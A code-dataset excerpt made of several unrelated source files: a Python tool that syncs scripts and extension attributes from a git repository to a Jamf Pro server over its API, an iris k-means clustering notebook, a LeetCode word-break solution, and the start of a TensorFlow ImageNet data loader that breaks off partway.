folder containing the script and XML files\n xml_file (pathlib.Path): XML file defined by the subclass's\n ``filename`` class attribute\n new_url (str): url for creating a new object in the JSS defined by\n parsing a new url using ``urllib.parse.urljoin`` to join the\n ``JPS_URL`` global with the subclass's ``resource`` class atribute.\n name (str): If the XML file contains the ```` tag, then this name\n is used when GET or PUT are performed in the JSS. Otherwise,\n ``folder.name`` is used as a fallback.\n xml (xml.etree.ElementTree.Element): Element object containing the\n contents of the XML file if available, otherwise the ``get`` method\n will attempt to download the existing XML from the JSS. If neither\n are available, the template stored in ``templates/`` is used with\n the file defined by the subclass' ``filename`` class attribute.\n data (str): String containing the contents of the script file to be\n embedded in ``xml`` prior to the PUT stage. Populated by\n ``get_data`` when the ``get`` method is called. The script file\n is discovered by globbing ``folder`` and looking for files with a\n ``pathlib.Path.suffix`` defined in ``SUPPORTED_EXTENSIONS``.\n\n \"\"\"\n def __init__(self, folder, *args, **kwargs):\n \"\"\"Initialization of a JamfObject object\n\n Nothing much happens at initialization. No IO is used in order to not\n slow down the script, and because the ``get`` method requires an\n ``aiohttp`` session and ``asyncio`` semaphore so that any missing XML\n may be gathered from the JSS.\n\n Args:\n folder (str): Name of the folder containing the script and xml for\n each subclass object.\n\n \"\"\"\n self.folder = FILE_PATH.joinpath(self.source, folder)\n self.xml_file = self.folder.joinpath(self.filename + \".xml\")\n self.new_url = urlparse.urljoin(\n JPS_URL, f\"/JSSResource/{self.resource}/id/0\")\n self.name = None\n self.xml = None\n self.data = None\n\n def __str__(self):\n return f\"{self.folder}\"\n\n def resource_url(self):\n \"\"\"Returns the URL for each extant object in the JSS\n\n Args:\n None\n\n Returns:\n None: if ``name`` is not defined\n str: returns a str parsed by ``urllib.parse.urljoin`` combining\n the ``JPS_URL`` global and the subclass' ``resource`` class\n attribute, and the discovered ``name`` attribute.\n\n \"\"\"\n if not self.name:\n return None\n return urlparse.urljoin(\n JPS_URL, f\"/JSSResource/{self.resource}/name/{self.name}\")\n\n async def get(self, session, semaphore):\n \"\"\"Gets the information needed to upload an object to the JSS either\n from the XML in the folder, the JSS, or from the template as needed.\n\n Args:\n session (aiohttp.ClientSession): an active session to eventually\n pass to the ``get_resource`` function if needed.\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n\n Returns:\n xml (xml.etree.ElementTree.Element): Though not strictly necessary\n for the execution of the script, the ``xml`` attribute is\n returned for testing purposes.\n\n \"\"\"\n if not self.xml:\n if not self.xml_file.exists():\n self.xml = await self.get_xml(session, semaphore)\n else:\n LOG.debug(\"Reading in XML file: %s\", self.xml_file)\n self.xml = await parse_xml(self.xml_file)\n # Make sure we have the actual name from the XML\n # rather than using the folder name.\n self.name = self.xml.find(\"name\").text\n await self.cleanup_xml()\n LOG.debug(\"XML Contents: %s\", make_pretty_xml(self.xml))\n if not self.data:\n if not await self.get_data():\n LOG.error(\"No 
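# --- Editor's note: quick demonstration of the urljoin-based URL building used by
# JamfObject above; the host and object name are placeholders.
import urllib.parse as urlparse

JPS_URL = "https://company.jamfcloud.com"
print(urlparse.urljoin(JPS_URL, "/JSSResource/scripts/name/my_script"))
# -> https://company.jamfcloud.com/JSSResource/scripts/name/my_script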
script file found in %s\", self.folder)\n return # Need to skip if no script.\n return self.xml\n\n async def put(self, session, semaphore):\n \"\"\"PUTs the information gathered by the ``get`` method into the JSS.\n\n Args:\n session (aiohttp.ClientSession): an active session to eventually\n pass to the ``get_resource`` function if needed.\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n\n Returns:\n bool: True if the PUT succeeds, False if it does not.\n\n \"\"\"\n put_response = None\n for attempt in range(1, RE_TRIES):\n try:\n put_response = await put_resource(\n self.xml, self.resource_url(),\n self.new_url, session, semaphore)\n break\n except asyncio.exceptions.TimeoutError:\n LOG.error(\"%s: Upload timed out. This is attempt %d of %d\",\n self.name, attempt, RE_TRIES)\n if put_response in (201, 200):\n LOG.info(\"Uploaded %s: %s\", self.class_name, self.name)\n return True\n LOG.error(\"Uploading %s %s Failed!\", self.class_name, self.name)\n return False\n\n async def get_xml(self, session, semaphore):\n \"\"\"Called by the ``get`` method if the XML file is missing from\n ``folder``. Here is where the ``name`` is inferred from\n ``pathlib.Path.name``. This is not an ideal scenario, so warnings are\n issued. Then an attempt is made to GET from the JSS. If this fails,\n the XML template file defined in the subclass is used instead.\n\n Args:\n session (aiohttp.ClientSession): an active session to eventually\n pass to the ``get_resource`` function if needed.\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n\n Returns:\n _template (xml.etree.ElementTree.Element): returns either the\n GET results from the JSS or the template file contents.\n\n \"\"\"\n LOG.warning(\"%s: Inferring name from folder.\", self.folder.name)\n self.name = self.folder.name\n LOG.warning(\"%s: XML Missing. Attempting GET from JSS.\", self.name)\n # Get XML object from the JPS\n _template = await get_resource(self.resource_url(), session, semaphore)\n if not _template:\n LOG.error(\"%s: GET Failed! Using template: %s\",\n self.name, self.template)\n _template = await parse_xml(self.template)\n return _template\n\n async def _cleanup_xml(self):\n \"\"\"All of the common XML cleanup activities should be performed here\n to reduce the amount of duplicated code where possible. Any special\n actions should be taken in each subclass' ``cleanup_xml`` method.\n\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n # If name is missing or blank, then set it to the folder name, but\n # issue a warning because this should not be considered good practice.\n _name = self.xml.find(\"name\")\n if _name is None:\n LOG.warning(\"%s: Name is missing from XML. Setting to '%s'. \"\n \"Update XML file: '%s' to stop seeing this message.\",\n self.folder.name, self.folder.name, str(self.xml_file))\n ET.SubElement(self.xml, \"name\").text = self.folder.name\n elif not _name.text:\n LOG.warning(\"%s: Name is blank in the XML. Setting to '%s'. 
\"\n \"Update XML file: '%s' to stop seeing this message.\",\n self.folder.name, folder.name, str(self.xml_file))\n self.xml.find(\"name\").text = self.folder.name\n if self.xml.find(self.data_xpath) is not None:\n self.xml.find(self.data_xpath).clear()\n if self.xml.find(\"id\") is not None:\n self.xml.remove(self.xml.find(\"id\"))\n if self.xml.find(\"filename\") is not None:\n self.xml.remove(self.xml.find(\"filename\"))\n\n async def _check_category(self):\n \"\"\"Special method only for objects that use categories. Should be\n called by that object's ``cleanup_xml`` method.\n\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n # Check the category\n _category = self.xml.find(\"category\")\n if _category is None:\n LOG.warning(\n \"%s: Category is missing from XML. Setting to None. \"\n \"Update XML file: '%s' to stop seeing this message.\",\n self.name, str(self.xml_file))\n ET.SubElement(self.xml, \"category\").text = \"None\"\n elif _category.text != \"None\" and _category.text not in CATEGORIES:\n LOG.warning(\n \"%s: Category '%s' not in the JSS. Setting to None. \"\n \"Update XML file: '%s' to stop seeing this message.\",\n self.name, _category.text, str(self.xml_file))\n _category.text = \"None\"\n\n\n async def get_data(self):\n \"\"\"Globs the ``folder`` looking for files with extensions defined in\n the ``SUPPORTED_EXTENSIONS`` global. If more than one file is found,\n the first is used.\n\n Once a file is found, its contents are read and placed into ``data``\n and the ``xml`` is updated to include the script contents using the\n subclass' ``data_xpath`` class attribute.\n\n Args:\n None\n\n Returns:\n None: if a script file cannot be found, then return None\n _data_file (pathlib.Path): Path to data file, used for testing\n purposes.\n\n \"\"\"\n # If name is missing or blank, then set it to the folder name, but\n # issue a warning because this should not be considered good practice.\n try:\n # Get all the script files within the folder, we'll only use\n # script_file[0] in case there are multiple files\n self._data_file = [f for f in self.folder.glob(\"*\")\n if f.suffix in SUPPORTED_EXTENSIONS][0]\n # Read the file and assign the contents to self.data\n with open(self._data_file, \"r\") as f:\n self.data = f.read()\n # Write data to the appropriate element within the XML.\n self.xml.find(self.data_xpath).text = self.data\n except IndexError:\n return None\n return self._data_file\n\n\nclass ExtensionAttribute(JamfObject):\n \"\"\"Subclass of ``JamfObject`` that defines attributes and methods for\n Extension Attributes.\n\n Attributes:\n class_name (str): String used for pretty printing the name\n source (str): String used for building the pathlib.Path ``folder``\n attribute in JamfObject\n filename (str): String used for building multiple pathlib.Path objects\n to files such as the XML file and script file.\n resource (str): Used by JamfObject after \"JSSResource\" to define the\n ``new_url`` attribute and the ``resource_url`` method to build\n the URL for the object in the JSS.\n data_xpath (str): Used by JamfObject to define where to write the\n ``data`` attribute (script) string to the XML prior to PUT.\n template (pathlib.Path): Path to the template in case the XML file is\n missing or the object does not yet exist in the JSS.\n\n \"\"\"\n class_name = \"Extension Attribute\"\n source = \"extension_attributes\"\n filename = \"ea\"\n resource = \"computerextensionattributes\"\n data_xpath = \"input_type/script\"\n template = FILE_PATH.joinpath(\"templates/ea.xml\")\n\n def 
__init__(self, folder, *args, **kwargs):\n \"\"\"Initialization of an ``ExtensionAttribute`` object\n\n Simply calls the superclass' (JamfObject) ``__init__`` method as most\n functionality is abstracted there.\n\n Args:\n folder (str): Name of the folder containing the script and xml for\n the ``ExtensionAttribute`` object.\n\n \"\"\"\n super().__init__(folder, *args, **kwargs)\n\n def __repr__(self):\n return f\"\"\n\n async def cleanup_xml(self):\n \"\"\"Called after ``xml`` is gathered in ``JamfObject`` in order to\n ensure the uploaded XML is clean of any superfluous tags.\n\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n # Call JamfObject._cleanup_xml to reduce repeated code.\n await self._cleanup_xml()\n\n\nclass Script(JamfObject):\n \"\"\"Subclass of ``JamfObject`` that defines attributes and methods for\n Scripts.\n\n Attributes:\n Attributes are identical in function to those in ``ExtensionAttribute``\n\n \"\"\"\n class_name = \"Script\"\n source = \"scripts\"\n filename = \"script\"\n resource = \"scripts\"\n data_xpath = \"script_contents\"\n template = FILE_PATH.joinpath(\"templates/script.xml\")\n\n def __init__(self, folder, *args, **kwargs):\n \"\"\"Initialization of a ``Script`` object\n\n Simply calls the superclass' (JamfObject) ``__init__`` method as most\n functionality is abstracted there.\n\n Args:\n folder (str): Name of the folder containing the script and xml for\n the ``Script`` object.\n\n \"\"\"\n super().__init__(folder, *args, **kwargs)\n\n def __repr__(self):\n return f\"\"\n\n async def cleanup_xml(self):\n \"\"\"Called after ``xml`` is gathered in ``JamfObject`` in order to\n ensure the uploaded XML is clean of any superfluous tags.\n\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n # Call JamfObject._cleanup_xml to reduce repeated code.\n await self._cleanup_xml()\n await self._check_category()\n # This tag is unique to Scripts so is only included here.\n if self.xml.find(\"script_contents_encoded\") is not None:\n self.xml.remove(self.xml.find(\"script_contents_encoded\"))\n\n\nasync def get_resource(url, session, semaphore, responses=(200,)):\n \"\"\"GET using the ``asyncio.ClientSession`` and return the XML.\n\n Significantly reduces the amount of repeated code by making all GET calls\n come through one function, irrespective of need. 
Returns the results as\n an ``xml.etree.ElementTree.Element`` object for further processing.\n\n Args:\n url (str): Full url of the requested resource in the JSS\n session (aiohttp.ClientSession): an active session object\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n responses (tuple): Acceptable HTTP status codes from the session.\n\n Returns:\n None: If response.status contains an HTTP status code not listed in\n ``responses``, then None is returned.\n xml.etree.ElementTree.Element: Otherwise a Element object is returned\n for further processing.\n\n \"\"\"\n get_results = None\n async with semaphore:\n with async_timeout.timeout(TIME_OUT):\n async with session.get(url, auth=S_AUTH, headers=S_HEAD) as resp:\n _text = await resp.text()\n LOG.debug(\n \"Response from URL: %s Status: %s Text: %s\",\n url, resp.status, _text)\n if resp.status in responses:\n get_results = ET.fromstring(_text)\n LOG.debug(\"URL: %s GET Results: %s\", url, get_results)\n return get_results\n\n\nasync def put_resource(xml_element, url, new_url, session, semaphore):\n \"\"\"PUT using the ``asyncio.ClientSession`` and return success.\n\n Significantly reduces the amount of repeated code by making all PUT calls\n come through one function, irrespective of need. Returns the HTTP response\n status code for further processing.\n\n Args:\n xml_element (xml.etree.ElementTree.Element): XML object to PUT\n in the JSS.\n url (str): Full URL of the resource in the JSS\n new_url (str): URL for creating a new object if it does not already\n exist in the JSS.\n session (aiohttp.ClientSession): an active session object\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n\n Returns:\n response.status (int): Returns the response status (200, 409, etc.)\n\n \"\"\"\n async with semaphore:\n with async_timeout.timeout(TIME_OUT):\n async with session.get(url, auth=S_AUTH, headers=S_HEAD) as resp:\n LOG.debug(\"URL: %s Initial PUT status: %s\", url, resp.status)\n if resp.status == 200:\n resp = await session.put(\n url,\n auth=S_AUTH,\n data=ET.tostring(xml_element),\n headers=S_HEAD)\n else:\n resp = await session.post(\n new_url,\n auth=S_AUTH,\n data=ET.tostring(xml_element),\n headers=S_HEAD)\n LOG.debug(\"URL: %s Final PUT status: %s\", url, resp.status)\n return resp.status\n\n\nasync def parse_xml(_path):\n \"\"\"Parses an XML file and returns the root object.\n\n Args:\n _path (pathlib.Path): Path to the XML file to be parsed.\n\n Returns:\n xml.etree.ElementTree.Element: root object of the XML file\n\n \"\"\"\n # To remove the visual abstraction of ``getroot`` this is moved here.\n return ET.parse(_path).getroot()\n\n\ndef make_pretty_xml(element):\n \"\"\"Parses an ``xml.etree.ElementTree.Element`` object and returns a string\n formatted for pretty-printing.\n\n Args:\n element (xml.etree.ElementTree.Element): XML object to convert.\n\n Returns:\n str: A string containing the XML\n\n \"\"\"\n return \"\\n\".join([md_l for md_l in minidom.parseString(\n ET.tostring(element, encoding=\"unicode\", method=\"xml\")\n ).toprettyxml(indent=\" \").splitlines() if md_l.strip()])\n\n\nasync def get_existing_categories(session, semaphore):\n \"\"\"GET the Categories from the JSS and return as a list.\n\n Args:\n session (aiohttp.ClientSession): an active session object\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many 
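# --- Editor's note: the semaphore-plus-timeout pattern used by get_resource()/
# put_resource() above, boiled down to a generic fetcher. The URL list, limit and
# timeout are assumptions; sync.py's module constants play these roles for real.
import asyncio
import aiohttp
import async_timeout

async def fetch_all(urls, limit=25, timeout=60):
    sem = asyncio.BoundedSemaphore(limit)
    async with aiohttp.ClientSession() as session:
        async def one(url):
            async with sem:  # never more than `limit` requests in flight
                with async_timeout.timeout(timeout):
                    async with session.get(url) as resp:
                        return await resp.text()
        return await asyncio.gather(*[one(u) for u in urls])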
connections to the JSS.\n\n Returns:\n list: A ``list`` of ``str``s containing the names of the Categories\n in the JSS. If there are none, an empty list is returned.\n\n \"\"\"\n categories = await get_resource(\n urlparse.urljoin(JPS_URL, \"/JSSResource/categories\"),\n session, semaphore,\n responses=(200, 201))\n if categories:\n return [c.find(\"name\").text for c in [\n e for e in categories.findall(\"category\")]]\n return []\n\n\ndef check_for_changes():\n \"\"\"Looks for files that were changed between the current commit and\n the last commit so we don't upload everything on every run\n\n If ``ARGS.jenkins`` is ``True``, then utilize the ``GIT_PREVIOUS_COMMIT``\n and ``GIT_COMMIT`` environment variables to discover the changes.\n\n Args:\n None\n\n Returns:\n tuple:\n ch_extattrs (list): ``list`` of ``str``s containing the names of\n the changed Extension Attributes.\n ch_scripts (list): ``list`` of ``str``s containing the names of\n the changed Scripts.\n\n \"\"\"\n git_cmd = [\"git\", \"--no-pager\", \"diff\", \"--name-only\"]\n # This line will work with the environmental variables in Jenkins\n if ARGS.jenkins:\n ch_cmd = git_cmd + [ev for ev in [\n os.environ.get(\"GIT_PREVIOUS_COMMIT\"),\n os.environ.get(\"GIT_COMMIT\")]\n if ev]\n # Compare the last two commits to determine the list of files that\n # were changed\n else:\n l_cmd = [\"git\", \"log\", \"-2\", \"--pretty=oneline\",\n \"--pretty=format:%h\"]\n git_commits = subprocess.check_output(l_cmd).splitlines()\n ch_cmd = git_cmd + [git_commits[1], git_commits[0]]\n git_changes = str(subprocess.check_output(ch_cmd)).splitlines()\n ch_extattrs, ch_scripts = [], []\n for ch in git_changes:\n ch_path = pathlib.Path(ch).parts\n try:\n is_extension_attribute = all((\n \"extension_attributes\" in ch_path,\n ch_path[1] not in ch_extattrs))\n is_script = all((\n \"scripts\" in ch_path,\n ch_path[1] not in ch_scripts))\n except IndexError:\n continue\n if is_extension_attribute:\n ch_extattrs.append(ch_path[1])\n elif is_script:\n ch_scripts.append(ch_path[1])\n return ch_extattrs, ch_scripts\n\n\ndef jenkins_format(ch_type, ch_list):\n \"\"\"Returns a ``list`` of ``str``s used by ``write_jenkins_file`` to create\n the ``str`` to write to the Jenkins file.\n\n Nested function ``j_fmt``:\n Args:\n ch_item (str): Name of changed item\n\n Returns:\n str: ``ch_item`` added to Jenkins style ``str``\n\n Args:\n ch_type (str): The type of changed object (i.e. 
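# --- Editor's note: minimal reproduction of the two-commit diff lookup that
# check_for_changes() above performs outside of Jenkins; run it inside any git
# checkout with at least two commits.
import subprocess

commits = subprocess.check_output(
    ["git", "log", "-2", "--pretty=oneline", "--pretty=format:%h"]).splitlines()
changed = subprocess.check_output(
    ["git", "--no-pager", "diff", "--name-only", commits[1], commits[0]])
print(changed.decode().splitlines())  # one changed path per entry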
\"eas\", \"scripts\")\n ch_list (list): ``list`` of ``str``s containing the name of each\n changed object.\n\n Returns:\n list: items formatted by ``j_fmt`` for writing to the Jenkins File.\n\n \"\"\"\n def j_fmt(ch_item):\n return f\"{SLACK_EMOJI} {ch_item}\\\\n\\\\\"\n return ([f\"{ch_type}={j_fmt(ch_list[0])}\"] +\n [j_fmt(ji) for ji in ch_list[1:]])\n\n\ndef write_jenkins_file():\n \"\"\"Write CHANGED_EXT_ATTRS and CHANGED_SCRIPTS to Jenkins file.\n\n $eas will contain the changed extension attributes, and $scripts will\n contain the changed scripts\n\n If there are no changes, the variable will be set to \"None\"\n\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n ea_contents = [\"eas=None\"]\n sc_contents = [\"scripts=None\"]\n if CHANGED_EXT_ATTRS:\n ea_contents = jenkins_format(\"eas\", CHANGED_EXT_ATTRS)\n ea_contents[-1] = ea_contents[-1].rstrip(\"\\\\\")\n if CHANGED_SCRIPTS:\n sc_contents = jenkins_format(\"scripts\", CHANGED_SCRIPTS)\n with open(\"jenkins.properties\", \"w\") as f:\n f.write(\"\\n\".join(ea_contents + sc_contents))\n\n\nasync def find_subdirs(_path):\n \"\"\"Globs a folder for subfolders.\n\n Args:\n _path (pathlib.Path): Folder to glob.\n\n Returns:\n list: Contains ``pathlib.Path`` objects for every folder.\n\n \"\"\"\n return [f for f in FILE_PATH.joinpath(_path).glob(\"*\") if f.is_dir()]\n\n\ndef get_args():\n \"\"\"Parse command line arguments.\n\n Reads command line arguments and returns their values. If required\n arguments are missing, the script does not continue executing. Also\n provides usage information.\n\n Args:\n None\n\n Returns:\n argparse.Namespace: Object containing all of the command line arguments\n or their defaults as attributes.\n\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Sync repo with JamfPro\")\n parser.add_argument(\n \"--url\", required=True, help=(\n \"URL for the target JSS instance (i.e. \"\n \"'https://mycompany.jamfcloud.com') (Required)\"))\n parser.add_argument(\n \"--username\", required=True, help=(\n \"Username in JSS with API privileges. (Required)\"))\n parser.add_argument(\n \"--password\", help=(\n \"Password for the 'username' account. If not provided, you will \"\n \"be prompted.\"))\n parser.add_argument(\n \"--limit\", type=int, default=25, help=(\n \"Limit of the total number of connections to make to the JSS.\"))\n parser.add_argument(\n \"--timeout\", type=int, default=60, help=(\n \"Number of seconds before a timeout is called and the request is \"\n \"attempted again.\"))\n parser.add_argument(\n \"--retries\", type=int, default=3, help=(\n \"Number of times to retry a request after a timeout occurs.\"))\n parser.add_argument(\n \"--verbose\", action=\"store_true\", help=(\n \"Greatly increase the output of the logging.\"))\n parser.add_argument(\n \"--do_not_verify_ssl\", action=\"store_false\", help=(\n \"Do not verify the SSL Certificate of the target JSS.\"))\n parser.add_argument(\n \"--update_all\", action=\"store_true\", help=(\n \"Update all objects even if they are unchanged.\"))\n parser.add_argument(\n \"--jenkins\", action=\"store_true\", help=(\n \"Write a Jenkins file: jenkins.properties with updated scripts \"\n \"and eas, and compare the '$GIT_PREVIOUS_COMMIT' environment \"\n \"variable with '$GIT_COMMIT'\"))\n return parser.parse_args()\n\n\nasync def main():\n \"\"\"Main Program: Called with script is executed with ``python sync.py``\n\n This is where all of the ``JamfObject``s are defined. 
The\n ``aiohttp.ClientSession`` and ``asyncio.BoundedSemaphore`` are setup, the\n object information is gathered, and uploaded if necessary.\n\n Args:\n None\n\n Returns:\n int: Returns a 1 on error and a 0 when successful to be passed to\n ``sys.exit`` so that failed jobs are caught when executing in a\n CI/CD environment.\n\n \"\"\"\n # pylint: disable=global-statement\n global CATEGORIES\n # Create the base objects for each type of upload.\n # Future: Make JamfObject a Factory to automate this.\n extension_attributes = sorted([\n ExtensionAttribute(ea.name)\n for ea in await find_subdirs(\"extension_attributes\")\n if ea.name in CHANGED_EXT_ATTRS or ARGS.update_all],\n key=lambda ea: ea.folder)\n scripts = sorted([\n Script(sc.name)\n for sc in await find_subdirs(\"scripts\")\n if sc.name in CHANGED_SCRIPTS or ARGS.update_all],\n key=lambda sc: sc.folder)\n all_items = extension_attributes + scripts\n # Start processing objects.\n semaphore = asyncio.BoundedSemaphore(ARGS.limit)\n tcp_connector = aiohttp.TCPConnector(ssl=ARGS.do_not_verify_ssl)\n async with aiohttp.ClientSession(connector=tcp_connector) as session:\n CATEGORIES = await get_existing_categories(session, semaphore)\n # GET item information (XML,etc).\n await asyncio.gather(\n *[asyncio.ensure_future(t.get(session, semaphore))\n for t in all_items])\n LOG.debug(\"Information Collected. Beginning upload process.\")\n print(\"\\n\\n== Beginning Upload ==\\n\")\n # PUT updated information into the JPS. Returns a list of bools.\n put_success = await asyncio.gather(\n *[asyncio.ensure_future(t.put(session, semaphore))\n for t in all_items])\n # Since put_success is a list of bools with True for a successful PUT and\n # False if not, if not all of them are True, then at least one was False\n # ergo throw an error.\n if not all(put_success):\n LOG.error(\"There was a problem uploading one or more items. 
\"\n \"Please check the log output and act accordingly.\")\n return 1\n return 0\n\n\nif __name__ == \"__main__\":\n # Setup Globals\n asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\n # Get command-line arguments\n ARGS = get_args()\n JPS_URL = ARGS.url\n TIME_OUT = ARGS.timeout\n RE_TRIES = ARGS.retries\n LOG.info(\"JPS Instance: %s\", JPS_URL)\n # Future, incorporate this into the async part of the script.\n CHANGED_EXT_ATTRS, CHANGED_SCRIPTS = check_for_changes()\n if not CHANGED_EXT_ATTRS and not CHANGED_SCRIPTS and not ARGS.update_all:\n LOG.info(\"No Changes to transfer to JPS.\")\n sys.exit(0)\n LOG.info(\"Changed Extension Attributes: %s\", CHANGED_EXT_ATTRS)\n LOG.info(\"Changed Scripts: %s\", CHANGED_SCRIPTS)\n if ARGS.jenkins:\n write_jenkins_file()\n # Ask for password if not supplied via command line args\n if not ARGS.password:\n ARGS.password = getpass.getpass()\n S_AUTH = aiohttp.BasicAuth(ARGS.username, ARGS.password)\n loop = asyncio.get_event_loop()\n if ARGS.verbose:\n LOG.setLevel(logging.DEBUG)\n loop.set_debug(True)\n loop.slow_callback_duration = 0.001\n warnings.simplefilter(\"always\", ResourceWarning)\n sys.exit(loop.run_until_complete(main()))\n","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":32764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"71156451","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n#import the following libraries.\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.cluster import KMeans\n\n\n# In[3]:\n\n\n#Load the data.\niris = datasets.load_iris()\n\n\n# In[4]:\n\n\n#Define the target (Y as target) and predictors (X as sepal length and sepal width).\nX = iris.data[:, :2]\ny = iris.target\n\n\n# In[5]:\n\n\nX\n\n\n# In[7]:\n\n\ny\n\n\n# In[8]:\n\n\n#visualize data through a scatter plot.\nplt.scatter(X[:,0], X[:,1], c=y, cmap='gist_rainbow')\nplt.xlabel('Spea1 Length', fontsize=18)\nplt.ylabel('Sepal Width', fontsize=18)\n\n\n# In[9]:\n\n\n# create k means cluster and fit the model. 
Consider three clusters and a random state of 21.\nkm = KMeans(n_clusters = 3, n_jobs = 4, random_state=21)\nkm.fit(X)\n\n\n# In[ ]:\n\n\n\n\n\n# In[10]:\n\n\nkm\n\n\n# In[11]:\n\n\n# display the three center points of the three clusters.\ncenters = km.cluster_centers_\nprint(centers)\n\n\n# In[19]:\n\n\n#Plot the original clusters \nfigure, axes = plt.subplots(1, 2, figsize=(16,8))\naxes[0].scatter(X[:, 0], X[:, 1], c=y, cmap='gist_rainbow',\nedgecolor='k', s=150)\n#Plot the identified clusters \nnew_labels = km.labels_\naxes[1].scatter(X[:, 0], X[:, 1], c=new_labels, cmap='jet',\nedgecolor='k', s=150)\n# give the title for the graph\naxes[0].set_title('Actual', fontsize=18)\naxes[1].set_title('Predicted', fontsize=18)\n# give the X,Y axis label to the graph\naxes[0].set_xlabel('Sepal length', fontsize=18)\naxes[0].set_ylabel('Sepal width', fontsize=18)\naxes[1].set_xlabel('Sepal length', fontsize=18)\naxes[1].set_ylabel('Sepal width', fontsize=18)\n\n\n# In[15]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"cluster/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"572426062","text":"class Solution(object):\n \"\"\"\n Given a string s and a dictionary of words dict, determine if s can be segmented into a space-separated sequence of one or more dictionary words.\n\n For example, given\n s = \"leetcode\",\n dict = [\"leet\", \"code\"].\n\n Return true because \"leetcode\" can be segmented as \"leet code\".\n \"\"\"\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: Set[str]\n :rtype: bool\n \"\"\"\n for e in wordDict:\n if s.startswith(e):\n if len(e) == len(s):\n return True\n else:\n if self.wordBreak(s[len(e):], wordDict):\n return True\n return False\n\nif __name__ == \"__main__\":\n a = Solution()\n print(a.wordBreak(\"leetcode\", [\"leet\", \"code\"]))\n print(a.wordBreak(\"leetcode\", [\"lee\", \"code\"]))\n","sub_path":"leet/139.WordBreak.py","file_name":"139.WordBreak.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"283096114","text":"\"\"\"CIFAR-10 data set.\n\nSee http://www.cs.toronto.edu/~kriz/cifar.html.\n\"\"\"\nimport os\nimport tensorflow as tf\nfrom template import BaseDataSampler\nimport sys\nimport multiprocessing\n\nHEIGHT = 224\nWIDTH = 224\nDEPTH = 3\ndatashape = [HEIGHT,WIDTH,DEPTH]\nnumexamples = 1281167\nsplit = 0.999\nDEFAULT_IMAGE_SIZE = 224\nNUM_CHANNELS = 3\nNUM_CLASSES = 1001\n\n\n\nimport data.imagenet.imagenet_preprocessing\n\n\nclass ImagenetDataset(object):\n \"\"\"Cifar10 data set.\n\n Described by http://www.cs.toronto.edu/~kriz/cifar.html.\n \"\"\"\n\n def __init__(self, data_dir, subset='train', use_distortion=True):\n self.data_dir = os.path.join(data_dir,\"imagenet\")\n self.subset = subset\n self.use_distortion = use_distortion\n\n def get_filenames(self):\n \"\"\"Returns a python list of all (sharded) data subset files.\n\n Returns:\n python list of all (sharded) data set files.\n Raises:\n ValueError: if there are not data_files matching the subset.\n \"\"\"\n tf_record_pattern = os.path.join(self.data_dir, '%s-*' % self.subset)\n data_files = tf.gfile.Glob(tf_record_pattern)\n if not data_files:\n print('No files found for dataset %s/%s at %s' % (self.name,\n self.subset,\n self.data_dir))\n\n self.download_message()\n sys.exit(-1)\n return data_files\n\n # def get_filenames(self):\n # if 
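# --- Editor's note: the recursive wordBreak in the record above re-explores the same
# suffixes and can degrade exponentially; this memoized variant (an editor's sketch
# with the same behavior) caches each start index so every suffix is solved once.
from functools import lru_cache

def word_break(s, word_dict):
    words = set(word_dict)

    @lru_cache(maxsize=None)
    def ok(i):
        return i == len(s) or any(
            s.startswith(w, i) and ok(i + len(w)) for w in words)

    return ok(0)

assert word_break("leetcode", ["leet", "code"]) is True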
self.subset == 'train':\n # return [os.path.join(self.data_dir, 'train.tfrecords'), os.path.join(self.data_dir, 'validation.tfrecords')]\n # if self.subset in ['train', 'validation', 'eval']:\n # return [os.path.join(self.data_dir, self.subset + '.tfrecords')]\n # else:\n # raise ValueError('Invalid data subset \"%s\"' % self.subset)\n\n def parser(self, example_serialized, is_training):\n \"\"\"Parses a single tf.Example into image and label tensors.\"\"\"\n feature_map = {\n 'image/encoded': tf.FixedLenFeature([], dtype=tf.string,\n default_value=''),\n 'image/class/label': tf.FixedLenFeature([], dtype=tf.int64,\n default_value=-1),\n 'image/class/text': tf.FixedLenFeature([], dtype=tf.string,\n default_value=''),\n }\n sparse_float32 = tf.VarLenFeature(dtype=tf.float32)\n # Sparse features in Example proto.\n feature_map.update({k: sparse_float32 for k in ['image/object/bbox/xmin',\n 'image/object/bbox/ymin',\n 'image/object/bbox/xmax',\n 'image/object/bbox/ymax']})\n\n features = tf.parse_single_example(example_serialized, feature_map)\n label = tf.cast(features['image/class/label'], dtype=tf.int32)\n\n xmin = tf.expand_dims(features['image/object/bbox/xmin'].values, 0)\n ymin = tf.expand_dims(features['image/object/bbox/ymin'].values, 0)\n xmax = tf.expand_dims(features['image/object/bbox/xmax'].values, 0)\n ymax = tf.expand_dims(features['image/object/bbox/ymax'].values, 0)\n\n # Note that we impose an ordering of (y, x) just to make life difficult.\n bbox = tf.concat([ymin, xmin, ymax, xmax], 0)\n\n # Force the variable number of bounding boxes into the shape\n # [1, num_boxes, coords].\n bbox = tf.expand_dims(bbox, 0)\n bbox = tf.transpose(bbox, [0, 2, 